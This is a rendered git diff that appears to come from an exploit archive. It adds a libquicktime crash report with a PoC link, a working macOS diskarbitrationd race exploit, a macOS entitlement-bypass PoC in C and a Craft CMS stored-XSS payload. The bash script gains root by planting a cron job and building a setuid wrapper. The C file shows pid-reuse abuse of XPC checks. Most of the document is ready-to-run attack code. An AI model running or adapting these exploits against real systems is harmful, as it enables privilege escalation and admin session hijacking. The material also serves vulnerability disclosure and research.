#5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
|
||||
#6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
|
||||
0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
|
||||
0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
|
||||
0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
|
||||
0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04
|
||||
=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==10979==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9128
|
||||
|
||||
|
||||
|
||||
|
||||
=================================
|
||||
|
||||
|
||||
qflb.wu () dbappsecurity com cn
|
||||
|
||||
|
||||
Proofs of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip
|
84
platforms/macos/local/42146.sh
Executable file
84
platforms/macos/local/42146.sh
Executable file
|
@ -0,0 +1,84 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Sources:
|
||||
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
|
||||
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
|
||||
|
||||
if ! security authorize system.volume.internal.mount &>/dev/null; then
|
||||
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
TARGET=/private/var/at
|
||||
SUBDIR=tabs
|
||||
DISK=/dev/disk0s1
|
||||
|
||||
TMPDIR=/tmp/pwn
|
||||
mkdir -p $TMPDIR
|
||||
cd $TMPDIR
|
||||
|
||||
cat << EOF > boom.c
|
||||
#include <assert.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
int main(int argc, char ** argv) {
|
||||
assert(argc == 2);
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
system(argv[1]);
|
||||
}
|
||||
EOF
|
||||
clang boom.c -o _boom || exit 1
|
||||
|
||||
race_link() {
|
||||
mkdir -p mounts
|
||||
|
||||
while true; do
|
||||
ln -snf mounts link
|
||||
ln -snf $TARGET link
|
||||
done
|
||||
}
|
||||
|
||||
race_mount() {
|
||||
while ! df -h | grep $TARGET >/dev/null; do
|
||||
while df -h | grep $DISK >/dev/null; do
|
||||
diskutil umount $DISK &>/dev/null
|
||||
done
|
||||
while ! df -h | grep $DISK >/dev/null; do
|
||||
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
|
||||
done
|
||||
done
|
||||
}
|
||||
|
||||
cleanup() {
|
||||
echo "Killing child process $PID and cleaning up tmp dir"
|
||||
kill -9 $PID
|
||||
rm -rf $TMPDIR
|
||||
}
|
||||
|
||||
if df -h | grep $DISK >/dev/null; then
|
||||
echo 2>&1 "$DISK already mounted. Exiting."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
race_link &
|
||||
PID=$!
|
||||
trap cleanup EXIT
|
||||
echo "Just imagine having that root shell. It's gonna be legen..."
|
||||
race_mount
|
||||
|
||||
echo "wait for it..."
|
||||
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
|
||||
rm -f /var/at/tabs/root
|
||||
echo "* * * * *" "$CMD" > /var/at/tabs/root
|
||||
|
||||
while ! [ -e $TMPDIR/boom ]; do
|
||||
sleep 1
|
||||
done
|
||||
|
||||
echo "dary!"
|
||||
kill -9 $PID
|
||||
sleep 0.1
|
||||
$TMPDIR/boom "rm /var/at/tabs/root"
|
||||
$TMPDIR/boom "umount -f $DISK"
|
||||
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
|
221
platforms/multiple/local/42145.c
Executable file
221
platforms/multiple/local/42145.c
Executable file
|
@ -0,0 +1,221 @@
|
|||
/*
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223
|
||||
|
||||
One way processes in userspace that offer mach services check whether they should perform an action on
|
||||
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
|
||||
|
||||
These decisions are made using the audit token which is appended by the kernel to every received mach message.
|
||||
The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
|
||||
|
||||
The canonical way which userspace daemons check a message sender's entitlements is as follows:
|
||||
|
||||
audit_token_t tok;
|
||||
xpc_connection_get_audit_token(conn, &tok);
|
||||
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
|
||||
|
||||
CFErrorRef err;
|
||||
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
|
||||
|
||||
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
|
||||
|
||||
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
|
||||
to build the SecTaskRef:
|
||||
|
||||
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
|
||||
{
|
||||
SecTaskRef task;
|
||||
|
||||
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
|
||||
...
|
||||
|
||||
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
|
||||
|
||||
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
|
||||
This pid now maps to the entitlements of that new binary.
|
||||
|
||||
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
|
||||
crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
|
||||
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
|
||||
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
|
||||
have its pid reused by the respawned entitled process.
|
||||
|
||||
Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
|
||||
as they are created.
|
||||
|
||||
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
|
||||
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
|
||||
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
|
||||
if the audit token was always checked.
|
||||
|
||||
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
|
||||
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
|
||||
of whitelisted binaries.
|
||||
|
||||
This may also open up access to privileged information which is protected by the entitlements.
|
||||
|
||||
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
|
||||
entitlement and pass the check without having that entitlement.
|
||||
|
||||
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
|
||||
|
||||
use an lldb invocation like:
|
||||
|
||||
sudo lldb -w -n corecaptured
|
||||
|
||||
then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
|
||||
|
||||
You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
|
||||
|
||||
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
|
||||
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
|
||||
|
||||
PoC tested on MacOS 10.12.3 (16D32)
|
||||
*/
|
||||
|
||||
// ianbeer
|
||||
#if 0
|
||||
MacOS/iOS userspace entitlement checking is racy
|
||||
|
||||
One way processes in userspace that offer mach services check whether they should perform an action on
|
||||
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
|
||||
|
||||
These decisions are made using the audit token which is appended by the kernel to every received mach message.
|
||||
The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
|
||||
|
||||
The canonical way which userspace daemons check a message sender's entitlements is as follows:
|
||||
|
||||
audit_token_t tok;
|
||||
xpc_connection_get_audit_token(conn, &tok);
|
||||
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
|
||||
|
||||
CFErrorRef err;
|
||||
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
|
||||
|
||||
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
|
||||
|
||||
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
|
||||
to build the SecTaskRef:
|
||||
|
||||
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
|
||||
{
|
||||
SecTaskRef task;
|
||||
|
||||
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
|
||||
...
|
||||
|
||||
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
|
||||
|
||||
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
|
||||
This pid now maps to the entitlements of that new binary.
|
||||
|
||||
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
|
||||
crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
|
||||
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
|
||||
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
|
||||
have its pid reused by the respawned entitled process.
|
||||
|
||||
Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
|
||||
as they are created.
|
||||
|
||||
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
|
||||
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
|
||||
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
|
||||
if the audit token was always checked.
|
||||
|
||||
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
|
||||
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
|
||||
of whitelisted binaries.
|
||||
|
||||
This may also open up access to privileged information which is protected by the entitlements.
|
||||
|
||||
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
|
||||
entitlement and pass the check without having that entitlement.
|
||||
|
||||
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
|
||||
|
||||
use an lldb invocation like:
|
||||
|
||||
sudo lldb -w -n corecaptured
|
||||
|
||||
then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
|
||||
|
||||
You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
|
||||
|
||||
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
|
||||
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
|
||||
|
||||
PoC tested on MacOS 10.12.3 (16D32)
|
||||
#endif
|
||||
|
||||
#include <errno.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#include <mach/mach.h>
|
||||
#include <xpc/xpc.h>
|
||||
|
||||
void exec_blocking(char* target, char** argv, char** envp) {
|
||||
// create the pipe
|
||||
int pipefds[2];
|
||||
pipe(pipefds);
|
||||
|
||||
int read_end = pipefds[0];
|
||||
int write_end = pipefds[1];
|
||||
|
||||
// make the pipe nonblocking so we can fill it
|
||||
int flags = fcntl(write_end, F_GETFL);
|
||||
flags |= O_NONBLOCK;
|
||||
fcntl(write_end, F_SETFL, flags);
|
||||
|
||||
// fill up the write end
|
||||
int ret, count = 0;
|
||||
do {
|
||||
char ch = ' ';
|
||||
ret = write(write_end, &ch, 1);
|
||||
count++;
|
||||
} while (!(ret == -1 && errno == EAGAIN));
|
||||
printf("wrote %d bytes to pipe buffer\n", count-1);
|
||||
|
||||
|
||||
// make it blocking again
|
||||
flags = fcntl(write_end, F_GETFL);
|
||||
flags &= ~O_NONBLOCK;
|
||||
fcntl(write_end, F_SETFL, flags);
|
||||
|
||||
// set the pipe write end to stdout/stderr
|
||||
dup2(write_end, 1);
|
||||
dup2(write_end, 2);
|
||||
|
||||
execve(target, argv, envp);
|
||||
}
|
||||
|
||||
xpc_connection_t connect(char* service_name){
|
||||
xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
|
||||
|
||||
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
|
||||
xpc_type_t t = xpc_get_type(event);
|
||||
if (t == XPC_TYPE_ERROR){
|
||||
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
|
||||
}
|
||||
printf("received an event\n");
|
||||
});
|
||||
xpc_connection_resume(conn);
|
||||
return conn;
|
||||
}
|
||||
|
||||
int main(int argc, char** argv, char** envp) {
|
||||
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!");
|
||||
|
||||
xpc_connection_t conn = connect("com.apple.corecaptured");
|
||||
|
||||
xpc_connection_send_message(conn, msg);
|
||||
|
||||
// exec a binary with the entitlement to talk to that daemon
|
||||
// make sure it doesn't exit by giving it a full pipe for stdout/stderr
|
||||
char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool";
|
||||
char* target_argv[] = {target_binary, NULL};
|
||||
exec_blocking(target_binary, target_argv, envp);
|
||||
|
||||
return 0;
|
||||
}
|
99
platforms/php/webapps/42143.txt
Executable file
99
platforms/php/webapps/42143.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
|
||||
# Date: 2017-06-08
|
||||
# Exploit Author: Ahsan Tahir
|
||||
# Vendor Homepage: https://craftcms.com
|
||||
# Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
|
||||
# Version: 2.6
|
||||
# Tested on: [Kali Linux 2.0 | Windows 8.1]
|
||||
# Email: mrahsan1337@gmail.com
|
||||
# Contact: https://twitter.com/AhsanTahirAT
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-06-08
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-06-08: Found the vulnerability.
|
||||
2017-06-08: Reported to vendor.
|
||||
2017-06-08: Published.
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6.
|
||||
Exploitation of the persistent xss web vulnerability requires a limited editor user account with low privileged (only editing news) and only low user interaction.
|
||||
|
||||
If attacker upload any file that can use for XSS (HTML, SWF, PHP etc..) it will not accept to uplaod as image. But for images it will stay the same. So if attacker upload SVG with JS content it will work fine and execute JS!
|
||||
|
||||
The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work.
|
||||
|
||||
Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation vulnerability can be exploited by a low prviledged user/editor with privileges, only for editing news. After successful exploitation, this attack can be used by editor to hijack admin account!
|
||||
|
||||
For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
Payload (Exploitation):
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
||||
<script type="text/javascript">
|
||||
alert(document.domain);
|
||||
</script>
|
||||
</svg>
|
||||
|
||||
|
||||
[+] Manual steps to reproduce ..
|
||||
1. Login with the editor account (only privilege to edit news) in Craft CMS
|
||||
2. Go to 'add news' option: https://localhost/admin/entries/news/new
|
||||
3. Put random values in title
|
||||
4. In your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload in the file:
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
||||
<script type="text/javascript">
|
||||
alert(document.domain);
|
||||
</script>
|
||||
</svg>
|
||||
4. Upload the xss.svg file in featured image option in Craft CMS
|
||||
5. Click on Save
|
||||
6. Now go to: https://localhost/s/assets/site/xss.svg
|
||||
7. XSS payload execution occurs and alert pop-up with domain name
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
|
Loading…
Add table
Reference in a new issue